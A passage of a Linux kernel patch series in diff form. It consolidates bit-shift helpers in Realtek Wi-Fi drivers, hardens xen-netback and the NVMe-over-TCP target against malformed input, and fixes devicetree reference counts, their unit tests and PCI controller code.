+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/phy.h
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/phy.h
+@@ -94,7 +94,6 @@ u32 _rtl92c_phy_rf_serial_read(struct ieee80211_hw *hw, enum radio_path rfpath,
+ 			       u32 offset);
+ u32 _rtl92c_phy_fw_rf_serial_read(struct ieee80211_hw *hw,
+ 				  enum radio_path rfpath, u32 offset);
+-u32 _rtl92c_phy_calculate_bit_shift(u32 bitmask);
+ void _rtl92c_phy_rf_serial_write(struct ieee80211_hw *hw,
+ 				 enum radio_path rfpath, u32 offset, u32 data);
+ void _rtl92c_phy_fw_rf_serial_write(struct ieee80211_hw *hw,
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192cu/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192cu/phy.c
+index a8d9fe269f313..0b8cb7e61fd80 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192cu/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192cu/phy.c
+@@ -32,7 +32,7 @@ u32 rtl92cu_phy_query_rf_reg(struct ieee80211_hw *hw,
+ 		original_value = _rtl92c_phy_fw_rf_serial_read(hw,
+ 							       rfpath, regaddr);
+ 	}
+-	bitshift = _rtl92c_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	readback_value = (original_value & bitmask) >> bitshift;
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE,
+ 		"regaddr(%#x), rfpath(%#x), bitmask(%#x), original_value(%#x)\n",
+@@ -56,7 +56,7 @@ void rtl92cu_phy_set_rf_reg(struct ieee80211_hw *hw,
+ 			original_value = _rtl92c_phy_rf_serial_read(hw,
+ 								    rfpath,
+ 								    regaddr);
+-			bitshift = _rtl92c_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data =
+ 			    ((original_value & (~bitmask)) |
+ 			     (data << bitshift));
+@@ -67,7 +67,7 @@ void rtl92cu_phy_set_rf_reg(struct ieee80211_hw *hw,
+ 			original_value = _rtl92c_phy_fw_rf_serial_read(hw,
+ 								       rfpath,
+ 								       regaddr);
+-			bitshift = _rtl92c_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data =
+ 			    ((original_value & (~bitmask)) |
+ 			     (data << bitshift));
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192de/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192de/phy.c
+index d18c092b61426..d835a27429f0f 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192de/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192de/phy.c
+@@ -169,13 +169,6 @@ static const u8 channel_all[59] = {
+ 	157, 159, 161, 163, 165
+ };
+ 
+-static u32 _rtl92d_phy_calculate_bit_shift(u32 bitmask)
+-{
+-	u32 i = ffs(bitmask);
+-
+-	return i ? i - 1 : 32;
+-}
+-
+ u32 rtl92d_phy_query_bb_reg(struct ieee80211_hw *hw, u32 regaddr, u32 bitmask)
+ {
+ 	struct rtl_priv *rtlpriv = rtl_priv(hw);
+@@ -198,7 +191,7 @@ u32 rtl92d_phy_query_bb_reg(struct ieee80211_hw *hw, u32 regaddr, u32 bitmask)
+ 	} else {
+ 		originalvalue = rtl_read_dword(rtlpriv, regaddr);
+ 	}
+-	bitshift = _rtl92d_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	returnvalue = (originalvalue & bitmask) >> bitshift;
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE,
+ 		"BBR MASK=0x%x Addr[0x%x]=0x%x\n",
+@@ -230,7 +223,7 @@ void rtl92d_phy_set_bb_reg(struct ieee80211_hw *hw,
+ 					dbi_direct);
+ 		else
+ 			originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-		bitshift = _rtl92d_phy_calculate_bit_shift(bitmask);
++		bitshift = calculate_bit_shift(bitmask);
+ 		data = ((originalvalue & (~bitmask)) | (data << bitshift));
+ 	}
+ 	if (rtlhal->during_mac1init_radioa || rtlhal->during_mac0init_radiob)
+@@ -317,7 +310,7 @@ u32 rtl92d_phy_query_rf_reg(struct ieee80211_hw *hw,
+ 		regaddr, rfpath, bitmask);
+ 	spin_lock(&rtlpriv->locks.rf_lock);
+ 	original_value = _rtl92d_phy_rf_serial_read(hw, rfpath, regaddr);
+-	bitshift = _rtl92d_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	readback_value = (original_value & bitmask) >> bitshift;
+ 	spin_unlock(&rtlpriv->locks.rf_lock);
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE,
+@@ -343,7 +336,7 @@ void rtl92d_phy_set_rf_reg(struct ieee80211_hw *hw, enum radio_path rfpath,
+ 		if (bitmask != RFREG_OFFSET_MASK) {
+ 			original_value = _rtl92d_phy_rf_serial_read(hw,
+ 				rfpath, regaddr);
+-			bitshift = _rtl92d_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data = ((original_value & (~bitmask)) |
+ 				(data << bitshift));
+ 		}
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192ee/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192ee/phy.c
+index cc0bcaf13e96e..73ef602bfb01a 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192ee/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192ee/phy.c
+@@ -16,7 +16,6 @@ static u32 _rtl92ee_phy_rf_serial_read(struct ieee80211_hw *hw,
+ static void _rtl92ee_phy_rf_serial_write(struct ieee80211_hw *hw,
+ 					 enum radio_path rfpath, u32 offset,
+ 					 u32 data);
+-static u32 _rtl92ee_phy_calculate_bit_shift(u32 bitmask);
+ static bool _rtl92ee_phy_bb8192ee_config_parafile(struct ieee80211_hw *hw);
+ static bool _rtl92ee_phy_config_mac_with_headerfile(struct ieee80211_hw *hw);
+ static bool phy_config_bb_with_hdr_file(struct ieee80211_hw *hw,
+@@ -46,7 +45,7 @@ u32 rtl92ee_phy_query_bb_reg(struct ieee80211_hw *hw, u32 regaddr, u32 bitmask)
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE,
+ 		"regaddr(%#x), bitmask(%#x)\n", regaddr, bitmask);
+ 	originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-	bitshift = _rtl92ee_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	returnvalue = (originalvalue & bitmask) >> bitshift;
+ 
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE,
+@@ -68,7 +67,7 @@ void rtl92ee_phy_set_bb_reg(struct ieee80211_hw *hw, u32 regaddr,
+ 
+ 	if (bitmask != MASKDWORD) {
+ 		originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-		bitshift = _rtl92ee_phy_calculate_bit_shift(bitmask);
++		bitshift = calculate_bit_shift(bitmask);
+ 		data = ((originalvalue & (~bitmask)) | (data << bitshift));
+ 	}
+ 
+@@ -92,7 +91,7 @@ u32 rtl92ee_phy_query_rf_reg(struct ieee80211_hw *hw,
+ 	spin_lock(&rtlpriv->locks.rf_lock);
+ 
+ 	original_value = _rtl92ee_phy_rf_serial_read(hw , rfpath, regaddr);
+-	bitshift = _rtl92ee_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	readback_value = (original_value & bitmask) >> bitshift;
+ 
+ 	spin_unlock(&rtlpriv->locks.rf_lock);
+@@ -119,7 +118,7 @@ void rtl92ee_phy_set_rf_reg(struct ieee80211_hw *hw,
+ 
+ 	if (bitmask != RFREG_OFFSET_MASK) {
+ 		original_value = _rtl92ee_phy_rf_serial_read(hw, rfpath, addr);
+-		bitshift = _rtl92ee_phy_calculate_bit_shift(bitmask);
++		bitshift = calculate_bit_shift(bitmask);
+ 		data = (original_value & (~bitmask)) | (data << bitshift);
+ 	}
+ 
+@@ -201,13 +200,6 @@ static void _rtl92ee_phy_rf_serial_write(struct ieee80211_hw *hw,
+ 		pphyreg->rf3wire_offset, data_and_addr);
+ }
+ 
+-static u32 _rtl92ee_phy_calculate_bit_shift(u32 bitmask)
+-{
+-	u32 i = ffs(bitmask);
+-
+-	return i ? i - 1 : 32;
+-}
+-
+ bool rtl92ee_phy_mac_config(struct ieee80211_hw *hw)
+ {
+ 	return _rtl92ee_phy_config_mac_with_headerfile(hw);
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192se/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192se/phy.c
+index aaa004d4d6d0a..0e2b9698088bb 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192se/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192se/phy.c
+@@ -14,13 +14,6 @@
+ #include "hw.h"
+ #include "table.h"
+ 
+-static u32 _rtl92s_phy_calculate_bit_shift(u32 bitmask)
+-{
+-	u32 i = ffs(bitmask);
+-
+-	return i ? i - 1 : 32;
+-}
+-
+ u32 rtl92s_phy_query_bb_reg(struct ieee80211_hw *hw, u32 regaddr, u32 bitmask)
+ {
+ 	struct rtl_priv *rtlpriv = rtl_priv(hw);
+@@ -30,7 +23,7 @@ u32 rtl92s_phy_query_bb_reg(struct ieee80211_hw *hw, u32 regaddr, u32 bitmask)
+ 		regaddr, bitmask);
+ 
+ 	originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-	bitshift = _rtl92s_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	returnvalue = (originalvalue & bitmask) >> bitshift;
+ 
+ 	rtl_dbg(rtlpriv, COMP_RF, DBG_TRACE, "BBR MASK=0x%x Addr[0x%x]=0x%x\n",
+@@ -52,7 +45,7 @@ void rtl92s_phy_set_bb_reg(struct ieee80211_hw *hw, u32 regaddr, u32 bitmask,
+ 
+ 	if (bitmask != MASKDWORD) {
+ 		originalvalue = rtl_read_dword(rtlpriv, regaddr);
+-		bitshift = _rtl92s_phy_calculate_bit_shift(bitmask);
++		bitshift = calculate_bit_shift(bitmask);
+ 		data = ((originalvalue & (~bitmask)) | (data << bitshift));
+ 	}
+ 
+@@ -160,7 +153,7 @@ u32 rtl92s_phy_query_rf_reg(struct ieee80211_hw *hw, enum radio_path rfpath,
+ 
+ 	original_value = _rtl92s_phy_rf_serial_read(hw, rfpath, regaddr);
+ 
+-	bitshift = _rtl92s_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	readback_value = (original_value & bitmask) >> bitshift;
+ 
+ 	spin_unlock(&rtlpriv->locks.rf_lock);
+@@ -191,7 +184,7 @@ void rtl92s_phy_set_rf_reg(struct ieee80211_hw *hw, enum radio_path rfpath,
+ 	if (bitmask != RFREG_OFFSET_MASK) {
+ 		original_value = _rtl92s_phy_rf_serial_read(hw, rfpath,
+ 							    regaddr);
+-		bitshift = _rtl92s_phy_calculate_bit_shift(bitmask);
++		bitshift = calculate_bit_shift(bitmask);
+ 		data = ((original_value & (~bitmask)) | (data << bitshift));
+ 	}
+ 
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
+index 5323ead30db03..fa1839d8ee55f 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
+@@ -29,9 +29,10 @@ static void _rtl8821ae_phy_rf_serial_write(struct ieee80211_hw *hw,
+ 					   u32 data);
+ static u32 _rtl8821ae_phy_calculate_bit_shift(u32 bitmask)
+ {
+-	u32 i = ffs(bitmask);
++	if (WARN_ON_ONCE(!bitmask))
++		return 0;
+ 
+-	return i ? i - 1 : 32;
++	return __ffs(bitmask);
+ }
+ static bool _rtl8821ae_phy_bb8821a_config_parafile(struct ieee80211_hw *hw);
+ /*static bool _rtl8812ae_phy_config_mac_with_headerfile(struct ieee80211_hw *hw);*/
+diff --git a/drivers/net/wireless/realtek/rtlwifi/wifi.h b/drivers/net/wireless/realtek/rtlwifi/wifi.h
+index 31f9e9e5c6804..0bac788ccd6e3 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/wifi.h
++++ b/drivers/net/wireless/realtek/rtlwifi/wifi.h
+@@ -3105,4 +3105,11 @@ static inline struct ieee80211_sta *rtl_find_sta(struct ieee80211_hw *hw,
+ 	return ieee80211_find_sta(mac->vif, mac_addr);
+ }
+ 
++static inline u32 calculate_bit_shift(u32 bitmask)
++{
++	if (WARN_ON_ONCE(!bitmask))
++		return 0;
++
++	return __ffs(bitmask);
++}
+ #endif
+diff --git a/drivers/net/wireless/realtek/rtw88/mac80211.c b/drivers/net/wireless/realtek/rtw88/mac80211.c
+index fabca307867a0..0970d6bcba439 100644
+--- a/drivers/net/wireless/realtek/rtw88/mac80211.c
++++ b/drivers/net/wireless/realtek/rtw88/mac80211.c
+@@ -266,9 +266,9 @@ static void rtw_ops_configure_filter(struct ieee80211_hw *hw,
+ 
+ 	if (changed_flags & FIF_ALLMULTI) {
+ 		if (*new_flags & FIF_ALLMULTI)
+-			rtwdev->hal.rcr |= BIT_AM | BIT_AB;
++			rtwdev->hal.rcr |= BIT_AM;
+ 		else
+-			rtwdev->hal.rcr &= ~(BIT_AM | BIT_AB);
++			rtwdev->hal.rcr &= ~(BIT_AM);
+ 	}
+ 	if (changed_flags & FIF_FCSFAIL) {
+ 		if (*new_flags & FIF_FCSFAIL)
+diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
+index c3a8d78a41a7b..2716040985748 100644
+--- a/drivers/net/xen-netback/netback.c
++++ b/drivers/net/xen-netback/netback.c
+@@ -463,12 +463,25 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 	}
+ 
+ 	for (shinfo->nr_frags = 0; nr_slots > 0 && shinfo->nr_frags < MAX_SKB_FRAGS;
+-	     shinfo->nr_frags++, gop++, nr_slots--) {
++	     nr_slots--) {
++		if (unlikely(!txp->size)) {
++			unsigned long flags;
++
++			spin_lock_irqsave(&queue->response_lock, flags);
++			make_tx_response(queue, txp, 0, XEN_NETIF_RSP_OKAY);
++			push_tx_responses(queue);
++			spin_unlock_irqrestore(&queue->response_lock, flags);
++			++txp;
++			continue;
++		}
++
+ 		index = pending_index(queue->pending_cons++);
+ 		pending_idx = queue->pending_ring[index];
+ 		xenvif_tx_create_map_op(queue, pending_idx, txp,
+ 				        txp == first ? extra_count : 0, gop);
+ 		frag_set_pending_idx(&frags[shinfo->nr_frags], pending_idx);
++		++shinfo->nr_frags;
++		++gop;
+ 
+ 		if (txp == first)
+ 			txp = txfrags;
+@@ -481,20 +494,39 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 		shinfo = skb_shinfo(nskb);
+ 		frags = shinfo->frags;
+ 
+-		for (shinfo->nr_frags = 0; shinfo->nr_frags < nr_slots;
+-		     shinfo->nr_frags++, txp++, gop++) {
++		for (shinfo->nr_frags = 0; shinfo->nr_frags < nr_slots; ++txp) {
++			if (unlikely(!txp->size)) {
++				unsigned long flags;
++
++				spin_lock_irqsave(&queue->response_lock, flags);
++				make_tx_response(queue, txp, 0,
++						 XEN_NETIF_RSP_OKAY);
++				push_tx_responses(queue);
++				spin_unlock_irqrestore(&queue->response_lock,
++						       flags);
++				continue;
++			}
++
+ 			index = pending_index(queue->pending_cons++);
+ 			pending_idx = queue->pending_ring[index];
+ 			xenvif_tx_create_map_op(queue, pending_idx, txp, 0,
+ 						gop);
+ 			frag_set_pending_idx(&frags[shinfo->nr_frags],
+ 					     pending_idx);
++			++shinfo->nr_frags;
++			++gop;
+ 		}
+ 
+-		skb_shinfo(skb)->frag_list = nskb;
+-	} else if (nskb) {
++		if (shinfo->nr_frags) {
++			skb_shinfo(skb)->frag_list = nskb;
++			nskb = NULL;
++		}
++	}
++
++	if (nskb) {
+ 		/* A frag_list skb was allocated but it is no longer needed
+-		 * because enough slots were converted to copy ops above.
++		 * because enough slots were converted to copy ops above or some
++		 * were empty.
+ 		 */
+ 		kfree_skb(nskb);
+ 	}
+diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
+index 355d80323b836..ce42afe8f64ef 100644
+--- a/drivers/nvme/target/tcp.c
++++ b/drivers/nvme/target/tcp.c
+@@ -18,6 +18,7 @@
+ #include "nvmet.h"
+ 
+ #define NVMET_TCP_DEF_INLINE_DATA_SIZE	(4 * PAGE_SIZE)
++#define NVMET_TCP_MAXH2CDATA		0x400000 /* 16M arbitrary limit */
+ 
+ /* Define the socket priority to use for connections were it is desirable
+  * that the NIC consider performing optimized packet processing or filtering.
+@@ -861,7 +862,7 @@ static int nvmet_tcp_handle_icreq(struct nvmet_tcp_queue *queue)
+ 	icresp->hdr.pdo = 0;
+ 	icresp->hdr.plen = cpu_to_le32(icresp->hdr.hlen);
+ 	icresp->pfv = cpu_to_le16(NVME_TCP_PFV_1_0);
+-	icresp->maxdata = cpu_to_le32(0x400000); /* 16M arbitrary limit */
++	icresp->maxdata = cpu_to_le32(NVMET_TCP_MAXH2CDATA);
+ 	icresp->cpda = 0;
+ 	if (queue->hdr_digest)
+ 		icresp->digest |= NVME_TCP_HDR_DIGEST_ENABLE;
+@@ -914,6 +915,7 @@ static int nvmet_tcp_handle_h2c_data_pdu(struct nvmet_tcp_queue *queue)
+ {
+ 	struct nvme_tcp_data_pdu *data = &queue->pdu.data;
+ 	struct nvmet_tcp_cmd *cmd;
++	unsigned int exp_data_len;
+ 
+ 	if (likely(queue->nr_cmds)) {
+ 		if (unlikely(data->ttag >= queue->nr_cmds)) {
+@@ -932,12 +934,24 @@ static int nvmet_tcp_handle_h2c_data_pdu(struct nvmet_tcp_queue *queue)
+ 			data->ttag, le32_to_cpu(data->data_offset),
+ 			cmd->rbytes_done);
+ 		/* FIXME: use path and transport errors */
+-		nvmet_req_complete(&cmd->req,
+-			NVME_SC_INVALID_FIELD | NVME_SC_DNR);
++		nvmet_tcp_fatal_error(queue);
+ 		return -EPROTO;
+ 	}
+ 
++	exp_data_len = le32_to_cpu(data->hdr.plen) -
++			nvmet_tcp_hdgst_len(queue) -
++			nvmet_tcp_ddgst_len(queue) -
++			sizeof(*data);
++
+ 	cmd->pdu_len = le32_to_cpu(data->data_length);
++	if (unlikely(cmd->pdu_len != exp_data_len ||
++		     cmd->pdu_len == 0 ||
++		     cmd->pdu_len > NVMET_TCP_MAXH2CDATA)) {
++		pr_err("H2CData PDU len %u is invalid\n", cmd->pdu_len);
++		/* FIXME: use proper transport errors */
++		nvmet_tcp_fatal_error(queue);
++		return -EPROTO;
++	}
+ 	cmd->pdu_recv = 0;
+ 	nvmet_tcp_build_pdu_iovec(cmd);
+ 	queue->cmd = cmd;
+diff --git a/drivers/nvme/target/trace.h b/drivers/nvme/target/trace.h
+index 6109b3806b12b..974d99d47f514 100644
+--- a/drivers/nvme/target/trace.h
++++ b/drivers/nvme/target/trace.h
+@@ -53,8 +53,7 @@ static inline void __assign_req_name(char *name, struct nvmet_req *req)
+ 		return;
+ 	}
+ 
+-	strncpy(name, req->ns->device_path,
+-		min_t(size_t, DISK_NAME_LEN, strlen(req->ns->device_path)));
++	strscpy_pad(name, req->ns->device_path, DISK_NAME_LEN);
+ }
+ #endif
+ 
+@@ -85,7 +84,7 @@ TRACE_EVENT(nvmet_req_init,
+ 		__entry->flags = cmd->common.flags;
+ 		__entry->nsid = le32_to_cpu(cmd->common.nsid);
+ 		__entry->metadata = le64_to_cpu(cmd->common.metadata);
+-		memcpy(__entry->cdw10, &cmd->common.cdw10,
++		memcpy(__entry->cdw10, &cmd->common.cdws,
+ 			sizeof(__entry->cdw10));
+ 	),
+ 	TP_printk("nvmet%s: %sqid=%d, cmdid=%u, nsid=%u, flags=%#x, "
+diff --git a/drivers/of/base.c b/drivers/of/base.c
+index d5a5c35eba72a..f849bbb9ef8c7 100644
+--- a/drivers/of/base.c
++++ b/drivers/of/base.c
+@@ -1646,6 +1646,7 @@ int of_parse_phandle_with_args_map(const struct device_node *np,
+ 		out_args->np = new;
+ 		of_node_put(cur);
+ 		cur = new;
++		new = NULL;
+ 	}
+ put:
+ 	of_node_put(cur);
+diff --git a/drivers/of/unittest-data/tests-phandle.dtsi b/drivers/of/unittest-data/tests-phandle.dtsi
+index 6b33be4c4416c..aa0d7027ffa68 100644
+--- a/drivers/of/unittest-data/tests-phandle.dtsi
++++ b/drivers/of/unittest-data/tests-phandle.dtsi
+@@ -38,6 +38,13 @@
+ 				phandle-map-pass-thru = <0x0 0xf0>;
+ 			};
+ 
++			provider5: provider5 {
++				#phandle-cells = <2>;
++				phandle-map = <2 7 &provider4 2 3>;
++				phandle-map-mask = <0xff 0xf>;
++				phandle-map-pass-thru = <0x0 0xf0>;
++			};
++
+ 			consumer-a {
+ 				phandle-list =	<&provider1 1>,
+ 						<&provider2 2 0>,
+@@ -64,7 +71,8 @@
+ 						<&provider4 4 0x100>,
+ 						<&provider4 0 0x61>,
+ 						<&provider0>,
+-						<&provider4 19 0x20>;
++						<&provider4 19 0x20>,
++						<&provider5 2 7>;
+ 				phandle-list-bad-phandle = <12345678 0 0>;
+ 				phandle-list-bad-args = <&provider2 1 0>,
+ 							<&provider4 0>;
+diff --git a/drivers/of/unittest.c b/drivers/of/unittest.c
+index edd2342598e49..e541a8960f1de 100644
+--- a/drivers/of/unittest.c
++++ b/drivers/of/unittest.c
+@@ -448,6 +448,9 @@ static void __init of_unittest_parse_phandle_with_args(void)
+ 
+ 		unittest(passed, "index %i - data error on node %pOF rc=%i\n",
+ 			 i, args.np, rc);
++
++		if (rc == 0)
++			of_node_put(args.np);
+ 	}
+ 
+ 	/* Check for missing list property */
+@@ -537,8 +540,9 @@ static void __init of_unittest_parse_phandle_with_args(void)
+ 
+ static void __init of_unittest_parse_phandle_with_args_map(void)
+ {
+-	struct device_node *np, *p0, *p1, *p2, *p3;
++	struct device_node *np, *p[6] = {};
+ 	struct of_phandle_args args;
++	unsigned int prefs[6];
+ 	int i, rc;
+ 
+ 	np = of_find_node_by_path("/testcase-data/phandle-tests/consumer-b");
+@@ -547,34 +551,24 @@ static void __init of_unittest_parse_phandle_with_args_map(void)
+ 		return;
+ 	}
+ 
+-	p0 = of_find_node_by_path("/testcase-data/phandle-tests/provider0");
+-	if (!p0) {
+-		pr_err("missing testcase data\n");
+-		return;
+-	}
+-
+-	p1 = of_find_node_by_path("/testcase-data/phandle-tests/provider1");
+-	if (!p1) {
+-		pr_err("missing testcase data\n");
+-		return;
+-	}
+-
+-	p2 = of_find_node_by_path("/testcase-data/phandle-tests/provider2");
+-	if (!p2) {
+-		pr_err("missing testcase data\n");
+-		return;
+-	}
+-
+-	p3 = of_find_node_by_path("/testcase-data/phandle-tests/provider3");
+-	if (!p3) {
+-		pr_err("missing testcase data\n");
+-		return;
++	p[0] = of_find_node_by_path("/testcase-data/phandle-tests/provider0");
++	p[1] = of_find_node_by_path("/testcase-data/phandle-tests/provider1");
++	p[2] = of_find_node_by_path("/testcase-data/phandle-tests/provider2");
++	p[3] = of_find_node_by_path("/testcase-data/phandle-tests/provider3");
++	p[4] = of_find_node_by_path("/testcase-data/phandle-tests/provider4");
++	p[5] = of_find_node_by_path("/testcase-data/phandle-tests/provider5");
++	for (i = 0; i < ARRAY_SIZE(p); ++i) {
++		if (!p[i]) {
++			pr_err("missing testcase data\n");
++			return;
++		}
++		prefs[i] = kref_read(&p[i]->kobj.kref);
+ 	}
+ 
+ 	rc = of_count_phandle_with_args(np, "phandle-list", "#phandle-cells");
+-	unittest(rc == 7, "of_count_phandle_with_args() returned %i, expected 7\n", rc);
++	unittest(rc == 8, "of_count_phandle_with_args() returned %i, expected 8\n", rc);
+ 
+-	for (i = 0; i < 8; i++) {
++	for (i = 0; i < 9; i++) {
+ 		bool passed = true;
+ 
+ 		memset(&args, 0, sizeof(args));
+@@ -585,13 +579,13 @@ static void __init of_unittest_parse_phandle_with_args_map(void)
+ 		switch (i) {
+ 		case 0:
+ 			passed &= !rc;
+-			passed &= (args.np == p1);
++			passed &= (args.np == p[1]);
+ 			passed &= (args.args_count == 1);
+ 			passed &= (args.args[0] == 1);
+ 			break;
+ 		case 1:
+ 			passed &= !rc;
+-			passed &= (args.np == p3);
++			passed &= (args.np == p[3]);
+ 			passed &= (args.args_count == 3);
+ 			passed &= (args.args[0] == 2);
+ 			passed &= (args.args[1] == 5);
+@@ -602,28 +596,36 @@ static void __init of_unittest_parse_phandle_with_args_map(void)
+ 			break;
+ 		case 3:
+ 			passed &= !rc;
+-			passed &= (args.np == p0);
++			passed &= (args.np == p[0]);
+ 			passed &= (args.args_count == 0);
+ 			break;
+ 		case 4:
+ 			passed &= !rc;
+-			passed &= (args.np == p1);
++			passed &= (args.np == p[1]);
+ 			passed &= (args.args_count == 1);
+ 			passed &= (args.args[0] == 3);
+ 			break;
+ 		case 5:
+ 			passed &= !rc;
+-			passed &= (args.np == p0);
++			passed &= (args.np == p[0]);
+ 			passed &= (args.args_count == 0);
+ 			break;
+ 		case 6:
+ 			passed &= !rc;
+-			passed &= (args.np == p2);
++			passed &= (args.np == p[2]);
+ 			passed &= (args.args_count == 2);
+ 			passed &= (args.args[0] == 15);
+ 			passed &= (args.args[1] == 0x20);
+ 			break;
+ 		case 7:
++			passed &= !rc;
++			passed &= (args.np == p[3]);
++			passed &= (args.args_count == 3);
++			passed &= (args.args[0] == 2);
++			passed &= (args.args[1] == 5);
++			passed &= (args.args[2] == 3);
++			break;
++		case 8:
+ 			passed &= (rc == -ENOENT);
+ 			break;
+ 		default:
+@@ -632,6 +634,9 @@ static void __init of_unittest_parse_phandle_with_args_map(void)
+ 
+ 		unittest(passed, "index %i - data error on node %s rc=%i\n",
+ 			 i, args.np->full_name, rc);
++
++		if (rc == 0)
++			of_node_put(args.np);
+ 	}
+ 
+ 	/* Check for missing list property */
+@@ -678,6 +683,13 @@ static void __init of_unittest_parse_phandle_with_args_map(void)
+ 		   "OF: /testcase-data/phandle-tests/consumer-b: #phandle-cells = 2 found 1");
+ 
+ 	unittest(rc == -EINVAL, "expected:%i got:%i\n", -EINVAL, rc);
++
++	for (i = 0; i < ARRAY_SIZE(p); ++i) {
++		unittest(prefs[i] == kref_read(&p[i]->kobj.kref),
++			 "provider%d: expected:%d got:%d\n",
++			 i, prefs[i], kref_read(&p[i]->kobj.kref));
++		of_node_put(p[i]);
++	}
+ }
+ 
+ static void __init of_unittest_property_string(void)
+diff --git a/drivers/pci/controller/dwc/pci-keystone.c b/drivers/pci/controller/dwc/pci-keystone.c
+index d2634dafb68e5..7ecad72cff7e7 100644
+--- a/drivers/pci/controller/dwc/pci-keystone.c
++++ b/drivers/pci/controller/dwc/pci-keystone.c
+@@ -1219,7 +1219,16 @@ static int ks_pcie_probe(struct platform_device *pdev)
+ 		goto err_link;
+ 	}
+ 
++	/* Obtain references to the PHYs */
++	for (i = 0; i < num_lanes; i++)
++		phy_pm_runtime_get_sync(ks_pcie->phy[i]);
++
+ 	ret = ks_pcie_enable_phy(ks_pcie);
++
++	/* Release references to the PHYs */
++	for (i = 0; i < num_lanes; i++)
++		phy_pm_runtime_put_sync(ks_pcie->phy[i]);
++
+ 	if (ret) {
+ 		dev_err(dev, "failed to enable phy\n");
+ 		goto err_link;
+diff --git a/drivers/pci/controller/dwc/pcie-designware-ep.c b/drivers/pci/controller/dwc/pcie-designware-ep.c
+index 83ddb190292e4..59c164b5c64aa 100644
+--- a/drivers/pci/controller/dwc/pcie-designware-ep.c
++++ b/drivers/pci/controller/dwc/pcie-designware-ep.c
+@@ -600,6 +600,7 @@ int dw_pcie_ep_raise_msix_irq(struct dw_pcie_ep *ep, u8 func_no,
+ 	}
+ 
+ 	aligned_offset = msg_addr & (epc->mem->window.page_size - 1);
++	msg_addr &= ~aligned_offset;
+ 	ret = dw_pcie_ep_map_addr(epc, func_no, 0, ep->msi_mem_phys, msg_addr,
+ 				  epc->mem->window.page_size);
+ 	if (ret)
+diff --git a/drivers/pci/controller/pcie-mediatek-gen3.c b/drivers/pci/controller/pcie-mediatek-gen3.c
+index b8612ce5f4d0c..40c38ca5a42e2 100644
+--- a/drivers/pci/controller/pcie-mediatek-gen3.c
++++ b/drivers/pci/controller/pcie-mediatek-gen3.c
+@@ -245,35 +245,60 @@ static int mtk_pcie_set_trans_table(struct mtk_gen3_pcie *pcie,
+ 				    resource_size_t cpu_addr,
+ 				    resource_size_t pci_addr,
+ 				    resource_size_t size,
+-				    unsigned long type, int num)
++				    unsigned long type, int *num)
+ {
++	resource_size_t remaining = size;
++	resource_size_t table_size;
++	resource_size_t addr_align;
++	const char *range_type;
+ 	void __iomem *table;
+ 	u32 val;
+ 
+-	if (num >= PCIE_MAX_TRANS_TABLES) {
+-		dev_err(pcie->dev, "not enough translate table for addr: %#llx, limited to [%d]\n",
+-			(unsigned long long)cpu_addr, PCIE_MAX_TRANS_TABLES);
+-		return -ENODEV;
+-	}
++	while (remaining && (*num < PCIE_MAX_TRANS_TABLES)) {
++		/* Table size needs to be a power of 2 */
++		table_size = BIT(fls(remaining) - 1);
++
++		if (cpu_addr > 0) {
++			addr_align = BIT(ffs(cpu_addr) - 1);
++			table_size = min(table_size, addr_align);
++		}
++
++		/* Minimum size of translate table is 4KiB */
++		if (table_size < 0x1000) {
++			dev_err(pcie->dev, "illegal table size %#llx\n",
++				(unsigned long long)table_size);
++			return -EINVAL;
++		}
+ 
+-	table = pcie->base + PCIE_TRANS_TABLE_BASE_REG +
